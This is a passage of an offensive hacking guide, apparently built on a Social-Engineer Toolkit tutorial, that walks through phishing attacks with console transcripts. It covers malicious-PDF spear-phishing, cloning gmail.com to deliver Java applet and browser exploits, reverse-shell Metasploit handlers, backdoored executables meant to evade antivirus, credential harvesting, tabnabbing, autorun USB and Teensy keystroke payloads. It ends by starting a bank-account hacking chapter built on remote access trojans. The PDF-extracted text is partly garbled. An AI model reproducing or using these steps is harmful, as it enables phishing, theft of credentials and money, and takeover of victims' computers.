1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay
Enter your GMAIL email address: kennedyd013@gmail.com
Enter your password for gmail (it will not be displayed back to you):
SET has finished delivering the emails.

Do you want to setup a listener yes or no: yes
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***
|
|
_) |
__ `__ \
_ \ __| _` | __| __ \ | _ \ | __|
|
|
| __/ |
(
|\__ \ |
| | (
| | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]

+ -- --=[ 588 exploits - 300 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
=[ svn r10268 updated today (2010.09.09)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD
windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
msf exploit(handler) >
[*] Starting the payload handler...
Once the attack is all setup, the victim opens the email and opens the PDF up:
As soon as the victim opens the attachment up, a shell is presented back to us:
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1139) at
Thu Sep 09 09:58:06 -0400 2010
msf exploit(handler) > sessions -i 1

meterpreter > shell
Channel 1 created.
C:\Documents and Settings\Administrator\Desktop>
The spear-phishing attack can send to multiple people or individuals, it integrates into
Google mail and can be completely customized based on your needs for the attack vector.
Overall this is very effective for email spear-phishing.
Java Applet Attack Vector

The Java Applet is one of the core attack vectors within SET and the highest success rate
for compromise. The Java Applet attack will create a malicious Java Applet that once run
will completely compromise the victim. The neat trick with SET is that you can completely
clone a website and once the victim has clicked run, it will redirect the victim back to the
original site making the attack much more believable. This attack vector affects Windows,
Linux, and OSX and can compromise them all. Remember if you want to customize this
attack vector, edit the config/set_config in order to change the self-signed information. In
this specific attack vector, you can select web templates which are pre-defined websites
that have already been harvested, or you can import your own website. In this example we
will be using the site cloner which will clone a website for us. Lets launch SET and prep our
attack.
1.
2.
3.
4.
5.
6.
7
8.
9.
10.

Mass Mailer Attack

The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing
multiple web-based attacks in order to compromise the intended victim.
The Java Applet attack will spoof a Java Certificate and deliver a metasploit
based payload. Uses a customized java applet created by Thomas Werth to
deliver
the payload.
The Metasploit browser exploit method will utilize select Metasploit browser
exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester Method will utilize web cloning
of a website that has a username and password field and
harvest all the information posted to the website.
The TabNabbing Method will wait for a user to move to a
different tab, then refresh the page to something different.
The Man Left in the Middle Attack Method was introduced by
Kos and utilizes HTTP REFERER's in order to intercept fields
and harvest data from them. You need to have an already vulnerable
site and incorporate <script src="http://YOURIP/">. This could either
be from a compromised site or through XSS.
The web jacking attack method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its to slow/fast.
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.
1.
2.
3.
4.
5.
6.
7.

8. Return to the previous menu

Enter your choice (press enter for default): 1
The first method will allow SET to import a list of pre-defined

web applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
[!] Website Attack Vectors [!]
1.
2.
3.
4.
Web Templates
Site Cloner
Custom Import
Return to main menu
Enter number (1-4): 2

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com
[*]
[*]
[*]
[*]
[*]
Cloning the website: https://gmail.com

This could take a little bit...
Injecting Java Applet attack into the newly cloned website.
Filename obfuscation complete. Payload name is: tgbYm1k69
Malicious java applet website prepped for deployment
What payload do you want to generate:

Name:
Description:
1. Windows Shell Reverse_TCP

send back to attacker.
2. Windows Reverse_TCP Meterpreter
and send back to attacker.
3. Windows Reverse_TCP VNC DLL
4. Windows Bind Shell
accepting port on remote system.
Spawn a command shell on victim and

Spawn a meterpreter shell on victim
Spawn a VNC server on victim and
Execute payload and create an
5. Windows Bind Shell X64

Inline
6. Windows Shell Reverse_TCP X64
TCP Inline
7. Windows Meterpreter Reverse_TCP X64
(Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster
a port home via multiple ports
9. Import your own executable
executable
Windows x64 Command Shell, Bind TCP

Windows X64 Command Shell, Reverse
Connect back to the attacker
Spawn a meterpreter shell and find
Specify a path for your own
Enter choice (hit enter for default): 2

Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.
1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)
Enter your choice (enter for default): 16
[-] Enter the PORT of the listener (enter for default): 443
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit
executable.
********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************
Enter choice yes or no: yes
Enter the port to listen for on OSX: 8080

Enter the port to listen for on Linux: 8081
Created by msfpayload (http://www.metasploit.com).
Payload: osx/x86/shell_reverse_tcp
Length: 65
Options: LHOST=172.16.32.129,LPORT=8080
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
Length: 50
Options: LHOST=172.16.32.129,LPORT=8081
***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************
[--] Tested on IE6, IE7, IE8, Safari, Chrome, and FireFox [--]
[*]
[*]
[-]
[-]
[-]
Launching MSF Listener...

This may take a few to load MSF...
***
* WARNING: No database support: String User Disabled Database Support
***
_
| |
o
_ _ _
_ _|_ __,
,
_ | | __
_|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[
+ -- --=[
+ -- --=[
=[
metasploit v3.4.2-dev [core:3.4 api:1.0]

588 exploits - 300 auxiliary
224 payloads - 27 encoders - 8 nops
svn r10268 updated today (2010.09.09)
resource (src/program_junk/meta_config)> use

resource (src/program_junk/meta_config)> set
LHOST => 0.0.0.0
LPORT => 443
exploit/multi/handler
PAYLOAD
LHOST 0.0.0.0
LPORT 443
ExitOnSession false

resource (src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
PAYLOAD => osx/x86/shell_reverse_tcp
LHOST => 172.16.32.129
LPORT => 8080
linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
LHOST => 172.16.32.129
LPORT => 8081
resource (src/program_junk/meta_config)> set AutoRunScript migrate -f
AutoRunScript => migrate -f
In this attack, weve set up our scenario to clone https://gmail.com and use the reverse
meterpreter attack vector on port 443. Weve used the backdoored executable to hopefully
bypass anti-virus and setup Metasploit to handler the reverse connections. If you wanted to
utilize an email with this attack vector you could turn the config/set_config turn the
WEBATTACK_EMAIL=OFF to WEBATTACK_EMAIL=ON. When you get a victim to click a
link or coax him to your website, it will look something like this:
As soon as the victim clicks run, you are presented with a meterpreter shell, and the victim
is redirected back to the original Google site completely unaware that they have been
compromised.
Thu Sep 09 10:06:57 -0400 2010
meterpreter > shell
Channel 1 created.
Metasploit Browser Exploit Method

The Metasploit Browser Exploit Method will import Metasploit client-side exploits with the
ability to clone the website and utilize browser-based exploits. Lets take a quick look on
exploiting a browser exploit through SET.
1.
2.
3.
4.
5.
6.
7
8.
9.
10.

Mass Mailer Attack

The Social-Engineer Toolkit "Web Attack" vector is a unique way of
utilizing multiple web-based attacks in order to compromise the
intended victim.
The Java Applet attack will spoof a Java Certificate and
deliver a metasploit based payload. Uses a customized
java applet created by Thomas Werth to deliver
the payload.
The Metasploit browser exploit method will utilize select
Metasploit browser exploits through an iframe and deliver
a Metasploit payload.

1.
2.
3.
4.
5.
6.
7.
8.


functionality.
1.
2.
3.
4.
Web Templates
Site Cloner
Custom Import
Return to main menu

Enter the browser exploit you would like to use
1. Microsoft Windows WebDAV Application DLL Hijacker
2. Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution
3. Microsoft Windows Shell LNK Code Execution (MS10-046)
4. Microsoft Help Center XSS and Command Execution (MS10-042)
5. Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
6. Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)
7. Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
8. Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
9. Internet Explorer Style getElementsbyTagName Corruption (MS09-072)
10. Internet Explorer isComponentInstalled Overflow
11. Internet Explorer Explorer Data Binding Corruption (MS08-078)
12. Internet Explorer Unsafe Scripting Misconfiguration
13. FireFox 3.5 escape Return Value Memory Corruption
Enter your choice (1-12) (enter for default): 7
Name:
Description:

Inline
TCP Inline
9. Download/Run your Own Executable

Downloads an executable and runs it
Enter choice (example 1-8) (Enter for default):

Enter the port to use for the reverse (enter for default):
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....

[*] Malicious iframe injection successful...crafting payload.
***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************
[--] Tested on IE6, IE7, IE8, Safari, Chrome, and FireFox [--]
[*]
[*]
[-]
[-]
[-]

***
***
##
## ## #### ###### #### #####
#####
####### ## ## ## ##
## ## ##
####### ###### ## #####
#### ## ##
## # ##
## ## ## ## ##
#####
##
## #### ###
#####
#####
##
##
=[
+ -- --=[
+ -- --=[
=[
###
##
##
##
##
####
##
####
## ##
## ##
## ##
####
##
######
###
##
##
##
##
##
#### ###

resource (src/program_junk/meta_config)> use windows/browser/ms10_002_aurora

LHOST => 172.16.32.129
LPORT => 443
resource (src/program_junk/meta_config)> set URIPATH /
URIPATH => /
resource (src/program_junk/meta_config)> set SRVPORT 8080
SRVPORT => 8080
msf exploit(ms10_002_aurora) >

[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://172.16.32.129:8080/
[*] Server started.
Once the victim browses the website, it will look exactly like the site you cloned and then
compromise the system.
Thu Sep 09 10:14:22 -0400 2010
meterpreter > shell
Channel 1 created.

The credential harvester attack method is used when you dont want to specifically get a
shell but perform phishing attacks in order to obtain username and passwords from the
system. In this attack vector, a website will be cloned, and when the victim enters in the
user credentials, the usernames and passwords will be posted back to your machine and
then the victim will be redirected back to the legitimate site.
1.
2.
3.
4.
5.
6.
7.
8.


functionality.
1.
2.
3.
4.
Web Templates
Site Cloner
Custom Import
Return to main menu

Email harvester will allow you to utilize the clone capabilities within SET
to harvest credentials or parameters from a website as well as place them into
a report.

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] I have read the above message. [*]
Press {return} to continue.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
Once the victim clicks the link, they will be presented with an exact replica of gmail.com and
hopefully be enticed to enter their username and password into the form fields.
As soon as the victim hits sign in, we are presented with the credentials and the victim is
redirected back to the legitimate site.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
172.16.32.131 - - [09/Sep/2010 10:12:55] "GET / HTTP/1.1" 200 [*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-7536764660264620804
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=nwAWNiTEqGc
POSSIBLE USERNAME FIELD FOUND: Email=thisismyuser
POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=
[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT
Also note that when your finished to hit CONTROL-C, and a report will be generated for you
in two formats. The first is an html based report, the other is xml if you need to parse the
information into another tool.
^C[*] File exported to reports/2010-09-09 10:14:30.152435.html for your
reading pleasure...
[*] File in XML format exported to reports/2010-09-09 10:14:30.152435.xml for
your reading pleasure...
Press {return} to return to the menu.^C
The Social-Engineer Toolkit "Web Attack" vector is a unique way of
utilizing multiple web-based attacks in order to compromise the
intended victim.
The Java Applet attack will spoof a Java Certificate and
deliver a metasploit based payload. Uses a customized
java applet created by Thomas Werth to deliver
the payload.
The Metasploit browser exploit method will utilize select
Metasploit browser exploits through an iframe and deliver
a Metasploit payload.

1.
2.
3.
4.
5.
6.
7.
8.

Enter your choice (press enter for default): ^C

Thank you for shopping at the Social-Engineer Toolkit.
Hack the Gibson...
root@bt:/pentest/exploits/set# firefox reports/2010-09-09\ 10\:14\:30.152435.
2010-09-09 10:14:30.152435.html 2010-09-09 10:14:30.152435.xml
root@bt:/pentest/exploits/set# firefox reports/2010-09-09\
10\:14\:30.152435.html

The tabnabbing attack method is used when a victim has multiple tabs open, when the user
clicks the link, the victim will be presented with a Please wait while the page loads. When
the victim switches tabs because he/she is multi-tasking, the website detects that a different
tab is present and rewrites the webpage to a website you specify. The victim clicks back on
the tab after a period of time and thinks they were signed out of their email program or their
business application and types the credentials in. When the credentials are inserts, they are
harvested and the user is redirected back to the original website.
1.
2.
3.
4.
5.
6.
7.
8.


functionality.
1.
2.
3.
4.
Web Templates
Site Cloner
Custom Import
Return to main menu

[*]
[*]
[*]
[*]
Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs.

Social-Engineer Toolkit Credential Harvester Attack
Credential Harvester is running on port 80
Information will be displayed to you as it arrives below:
The victim is presented with a webpage that says please wait while the page loads.
When the victim switches tabs, the website is rewritten and then enters the credentials and
is harvested.
[*] WE GOT A HIT! Printing the output:

PARAM: ltmplcache=2
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-9060819085229816070
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=00-69E-Tt5g
POSSIBLE USERNAME FIELD FOUND: Email=sfdsfsd
POSSIBLE PASSWORD FIELD FOUND: Passwd=afds
PARAM: rmShown=1
PARAM: asts=

The man left in the middle attack utilizes HTTP REFERERS on an already compromised
site or XSS vulnerability to pass the credentials back to the HTTP server. In this instance if
you find a XSS vulnerability and send the URL to the victim and they click, the website will
operate 100 percent however when they go to log into the system, it will pass the
credentials back to the attacker and harvest the credentials.
1.
2.
3.
4.
5.
6.
7.
8.


***************************************************
Web Server Launched. Welcome to the SET MLTM.
***************************************************
Man Left in the Middle Attack brought to you by:
Kyle Osborn - kyle@kyleosborn.com
Starting server on 0.0.0.0:80...
[*] Server has started

The web jacking attack method will create a website clone and present the victim with a link
stating that the website has moved. This is a new feature to version 0.7. When you hover
over the link, the URL will be presented with the real URL, not the attackers machine. So for
example if your cloning gmail.com, the url when hovered over it would be gmail.com. When
the user clicks the moved link, gmail opens and then is quickly replaced with your malicious
webserver. Remember you can change the timing of the webjacking attack in the
config/set_config flags.
1.
2.
3.
4.

5.
6.
7.
8.


functionality.
1.
2.
3.
4.
Web Templates
Site Cloner
Custom Import
Return to main menu

[*]
[*]
[*]
[*]
Web Jacking Attack Vector is Enabled...Victim needs to click the link.

When the victim goes to the site he/she will notice the link below, notice the bottom left
URL, its gmail.com.
When the victim clicks the link he is presented with the following webpage:
If you notice the URL bar we are at our malicious web server. In cases with socialengineering, you want to make it believable, using an IP address is generally a bad idea.
My recommendation is if your doing a penetration test, register a name thats similar to the
victim, for gmail you could do gmai1.com (notice the 1), something similar that can mistake
the user into thinking its the legitimate site. Most of the time they wont even notice the IP
but its just another way to ensure it goes on without a hitch. Now that the victim enters the
username and password in the fields, you will notice that we can intercept the credentials
now.
[*]
[*]
[*]
[*]
Web Jacking Attack Vector is Enabled...Victim needs to click the link.

172.16.32.131 - - [09/Sep/2010 12:15:13] "GET / HTTP/1.1" 200 172.16.32.131 - - [09/Sep/2010 12:15:56] "GET /index2.html HTTP/1.1" 200 [*] WE GOT A HIT! Printing the output:
PARAM: ltmplcache=2
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-7017428156907423605
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=0JsVTaj70sk
POSSIBLE USERNAME FIELD FOUND: Email=thisismyusername
PARAM: rmShown=1
PARAM: asts=
Multi-Attack Web Vector

The multi-attack web vector is new to 0.7 and will allow you to specify multiple web attack
methods in order to perform a single attack. In some scenarios, the Java Applet may fail
however an internet explorer exploit would be successful. Or maybe the Java Applet and
the Internet Explorer exploit fail and the credential harvester is successful. The multi-attack
vector allows you to turn on and off different vectors and combine the attacks all into one
specific webpage. So when the user clicks the link he will be targeted by each of the attack
vectors you specify. One thing to note with the attack vector is you cant utilize Tabnabbing,
Cred Harvester, or Web Jacking with the Man Left in the Middle attack. Based on the attack
vectors they shouldnt be combined anyways. Lets take a look at the multi attack vector. In
this scenario Im going to turn on the Java Applet attack, Metasploit Client-Side exploit, and
the Web Jacking attack. When the victim browses the site, he/she will need to click on the
link and will be bombarded with credential harvester, Metasploit exploits, and the java applet
attack. Im going to intentionally select an Internet Explorer 7 exploit and browse utilizing
IE6 just to demonstrate if one fails, we have other methods.
1.
2.
3.
4.
5.
6.
7.
8.


The second method will completely clone a website of your
choosing and allow you to utilize the attack vectors within
the completely same web application you were attempting to clone.
functionality.
1.
2.
3.
4.
Web Templates
Site Cloner
Custom Import
Return to main menu

[*************************************************************]
Multi-Attack Web Attack Vector
[*************************************************************]
The multi attack vector utilizes each combination of attacks
and allow the user to choose the method for the attack. Once
you select one of the attacks, it will be added to your
attack profile to be used to stage the attack vector. When
your finished be sure to select the 'Im finished' option.
Select which attacks you want to use:
1.
2.
3.
4.
5.
6.
7.
8.
9.
The Java Applet Attack Method (OFF)

The Metasploit Browser Exploit Method (OFF)
Credential Harvester Attack Method (OFF)
Tabnabbing Attack Method (OFF)
Man Left in the Middle Attack Method (OFF)
Web Jacking Attack Method (OFF)
Use them all - A.K.A. 'Tactical Nuke'
I'm finished and want proceed with the attack.
Return to main menu.
Enter your choice one at a time (hit 8 or enter to launch): 1

Turning the Java Applet Attack Vector to ON
Option added. Press {return} to add or prepare your next attack.
[*************************************************************]
[*************************************************************]
1.
2.
3.
4.
5.
6.
7.
8.
9.
The Java Applet Attack Method (ON)

The Metasploit Browser Exploit Method (OFF)

Turning the Metasploit Client Side Attack Vector to ON
[*************************************************************]
[*************************************************************]

1.
2.
3.
4.
5.
6.
7.
8.
9.

The Metasploit Browser Exploit Method (ON)

Turning the Web Jacking Attack Vector to ON
[*************************************************************]
[*************************************************************]
1.
2.
3.
4.
5.
6.
7.
8.
9.

The Metasploit Browser Exploit Method (ON)
Credential Harvester Attack Method (ON)
Web Jacking Attack Method (ON)
Enter your choice one at a time (hit 8 or enter to launch):
Conversely you can use the Tactical Nuke option, which is option 7 that will enable all of
the attack vectors automatically for you. In this example you can see the flags change and
the Java Applet, Metasploit Browser Exploit, Credential Harvester, and Web Jacking attack
methods have all been enabled. In order to proceed hit enter or use option 8.
Enter your choice one at a time (hit 8 or enter to launch):
Name:
Description:

Inline
TCP Inline
executable

Enter choice (hit enter for default):

12.
13.
14.
15.
16.
unicode_upper (Normal)
alpha2 (Normal)
No Encoding (None)
Multi-Encoder (Excellent)
Backdoored Executable (BEST)
Enter your choice (enter for default):

[-] Enter the PORT of the listener (enter for default):
executable.
********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************
Enter choice yes or no: no
Enter the browser exploit you would like to use
1. Microsoft Windows WebDAV Application DLL Hijacker
2. Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution
3. Microsoft Windows Shell LNK Code Execution (MS10-046)
4. Microsoft Help Center XSS and Command Execution (MS10-042)
5. Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
6. Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)
7. Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
8. Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
9. Internet Explorer Style getElementsbyTagName Corruption (MS09-072)
10. Internet Explorer isComponentInstalled Overflow
11. Internet Explorer Explorer Data Binding Corruption (MS08-078)
12. Internet Explorer Unsafe Scripting Misconfiguration
13. FireFox 3.5 escape Return Value Memory Corruption
Enter your choice (1-12) (enter for default): 8
[*]
[*]
[*]
[*]
[*]
Cloning the website: https://gmail.com

This could take a little bit...
Injecting Java Applet attack into the newly cloned website.
Filename obfuscation complete. Payload name is: x5sKAzS
Malicious java applet website prepped for deployment
[*] Injecting iframes into cloned website for MSF Attack....

[*] Malicious iframe injection successful...crafting payload.
[*]
[*]
[-]
[-]
[-]

***
***
o
8
o
o
8
8
8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8
8 .oooo8 Yb..
8
8 8 8
8 8
8
8 8 8 8.
8 8
8
'Yb. 8
8 8 8
8 8
8
8 8 8 `Yooo'
8 `YooP8 `YooP' 8YooP' 8 `YooP' 8
8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[
+ -- --=[
+ -- --=[
=[

resource (src/program_junk/meta_config)> use

windows/browser/ms09_002_memory_corruption
LHOST => 172.16.32.129
LPORT => 443
resource (src/program_junk/meta_config)> set URIPATH /
URIPATH => /
resource (src/program_junk/meta_config)> set SRVPORT 8080
SRVPORT => 8080
msf exploit(ms09_002_memory_corruption) >
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://172.16.32.129:8080/
[*] Server started.
Now that we have everything running, lets browse to the website and see whats there. We
first get greeted with the site has been moved
We click the link and we are hit with a Metasploit exploit, look at the handler on the
backend.
[*] Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory
Corruption to
172.16.32.131:1329...
This exploit fails because we are using internet explorer 6, once this fails, check out the
victims screen:
We hit run, and we have a meterpreter shell. In this instance we would be redirected back to
the original Google because the attack was successful. If you also notice, when using the
Java Applet we automatically migrate to a separate thread (process) and happens to be
notepad.exe. Reason being is if the victim closes the browser, we will be safe and the
process wont terminate our meterpreter shell.
Thu Sep 09 12:33:20 -0400 2010
[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: java.exe (824)
[*] Spawning a notepad.exe host process...
[*] New server process: notepad.exe (3044)
Lets say that this attack failed and the user hit cancel. He would then be prompted to enter
his/her username and password into the username/password field.
[*] WE GOT A HIT! Printing the output:
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?ui=html
PARAM: zy=l
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-8578216484479049837
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=fYQL_bXkbzU
POSSIBLE USERNAME FIELD FOUND: Email=thisismyusername
PARAM: rmShown=1
PARAM: asts=

As previously mentioned, the Infectious Media Generator is a relatively simple attack vector.
SET will create a Metasploit-based payload, setup a listener for you and generate a folder
that needs to be burned or written to a DVD/USB drive. Once inserted, if AutoRun is
enabled, the code will automatically execute and take control of the machine.
1.
2.
3.
4.
5.
6.
7
8.
9.
10.

Mass Mailer Attack

Name:
Description:

Inline
TCP Inline
executable


13. alpha2 (Normal)

executable.
[*] Your attack has been created in the SET home directory folder "autorun"
[*] Copy the contents of the folder to a CD/DVD/USB to autorun.
[*] The payload can be found in the SET home directory.
[*]
[*]
[-]
[-]
[-]
Do you want to start the listener now? yes or no: yes

Please wait while the Metasploit listener is loaded...
***
***
888
888
d8b888
888
888
Y8P888
888
888
888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888
"88b88K
888 "88b888d88""88b888888
888 888 88888888888888
.d888888"Y8888b.888 888888888 888888888
888 888 888Y8b.
Y88b. 888 888
X88888 d88P888Y88..88P888Y88b.
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888
=[
+ -- --=[
+ -- --=[
=[


LHOST => 0.0.0.0
LPORT => 443
When doing an ls al in the SET directory you should notice that there is an autorun folder.
Burn the contents of that directory to a DVD or write to a USB device. Once inserted you
would be presented with a shell.
Thu Sep 09 12:42:32 -0400 2010
[*] Spawning a notepad.exe host process...
[*] New server process: notepad.exe (3044)

The Teensy USB HID Attack Vector is a remarkable combination of customized hardware
and bypassing restrictions by keyboard emulation. Traditionally when you insert a DVD/CD
or USB if autorun is disabled, your autorun.inf isnt called and you cant execute your code
automatically. With the Teensy HID based device you can emulate a keyboard and mouse.
When you insert the device it will be detected as a keyboard, and with the microprocessor
and onboard flash memory storage you can send a very fast set of keystrokes to the
machine and completely compromise it. You can order a Teensy device for around 17
dollars at http://www.prjc.com. Quickly after David Kennedy, Josh Kelley, and Adrian
Crewshaws talk on the Teensy devices, a PS3 hack came out utilizing the Teensy devices
and they are currently backordered during the time of writing this tutorial.
Lets setup or Teensy device to do a WSCRIPT downloader of a Metasploit payload. What
will occur here is that a small wscript file will be written out which will download an
executable and execute it. This will be our Metasploit payload and is all handled through the
Social-Engineer Toolkit.
1.
2.
3.
4.
5.
6.
7
8.
9.
10.

Mass Mailer Attack

Welcome to the Teensy HID Attack Vector.
Special thanks to: IronGeek and WinFang
The Teensy HID Attack Vector utilizes the teensy USB device to
program the device to act as a keyboard. Teensy's have onboard
storage and can allow for remote code execution on the physical
system. Since the devices are registered as USB Keyboard's it
will bypass any autorun disabled or endpoint protection on the
system.
You will need to purchase the Teensy USB device, it's roughly
$22 dollars. This attack vector will auto generate the code
needed in order to deploy the payload on the system for you.
This attack vector will create the .pde files necessary to import
into Arduino (the IDE used for programming the Teensy). The attack
vectors range from Powershell based downloaders, wscript attacks,
and other methods.
For more information on specifications and good tutorials visit:
http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystrokedongle
To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html
Select a payload to create the pde file to import into Arduino:
1.
2.
3.
4.
Powershell HTTP GET MSF Payload

WSCRIPT HTTP GET MSF Payload
Powershell based Reverse Shell
Return to the main menu.
Do you want to create a payload and listener yes or no: yes

Name:
Description:

Inline
TCP Inline
executable


13. alpha2 (Normal)

executable.
[*] PDE file created. You can get it under 'reports/teensy.pde'

[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in
Arduino
Press enter to continue.
[*]
[*]
[-]
[-]
[-]

***
***
____________
< metasploit >
-----------\
,__,
\ (oo)____
(__)
)\
||--|| *
=[
+ -- --=[
+ -- --=[
=[


LHOST => 0.0.0.0
LPORT => 443
Now that we have everything ready, SET exports a file called teensy.pde to the reports/
folder. Copy that reports folder to wherever you have Arduino installed. With this attack,
follow the instructions at PRJC on how to upload your code to the Teensy board, its
relatively simple you just need to install the Teensy Loader and the Teensy libraries. Once
you do that you will have an IDE interface called Arduino. One of the MOST important
aspects of this is to ensure you set your board to a Teensy USB Keyboard/Mouse.
Once you have this selected, drag your pde file into the Arduino interface. Arduino/Teensy
supports Linux, OSX, and Windows. Insert your USB device into the computer and upload
your code. This will program your device with the SET generated code. Below is uploading
and the code.
Once the USB device is inserted on the victim machine, once finished you should be
presented with a meterpreter shell.
Thu Sep 09 12:52:32 -0400 2010
[*]
[*]
[*]
msf
Spawning a notepad.exe host process...

Migrating into process ID 3044
New server process: notepad.exe (3044)
exploit(ms09_002_memory_corruption) >
So you have done social engineering with computer support.

This is the most powerful trick to exploit at the moment.
Thanks again to www.social-engineer.org for developing the tool
and giving the tutorial.
PART-II
The hackers Implentation
Chapter 1:Online Bank Account Hacking.
This is a short Part which deals about how
the Existing Hackers Hack Bank
Accounts.
This section is strictly for educational
purposes and aiding the system
administrators of how actually hackers
are able to hack the bank accounts.
Chapter 1:Online Bank Account Hacking.

I would have simply put forward a email account hacking tutorial
but It isnt enough to let the security personals know how much
risk is common man at this moment of internet banking.
So the first step is to install a RAT(remote access trojan) in the

victims computer.
Installing Rats is not difficult trust me.Just use the following tools
Spear-Phishing Attack Vector: The spear-phishing attack menu is used for performing
targeted email attacks against a victim. You can send multiple emails based on what your
harvested or you can send it to individuals. You can also utilize fileformat (for example a PDF
bug) and send the malicious attack to the victim in order to hopefully compromise the
system.
Website Attack vector: The web attack vector is used by performing phishing attacks
against the victim in hopes they click the link. There is a wide-variety of attacks that can
occur once they click. We will dive into each one of the attacks later on.
Infectious Media Generator: The infectious USB/DVD creator will develop a Metasploit
based payload for you and craft an autorun.inf file that once burned or placed on a USB will
trigger an autorun feature and hopefully compromise the system. This attack vector is
relatively simple in nature and relies on deploying the devices to the physical system.
Create a payload and Listner: The create payload and listener is an extremely simple
wrapper around Metasploit to create a payload, export the exe for you and generate a
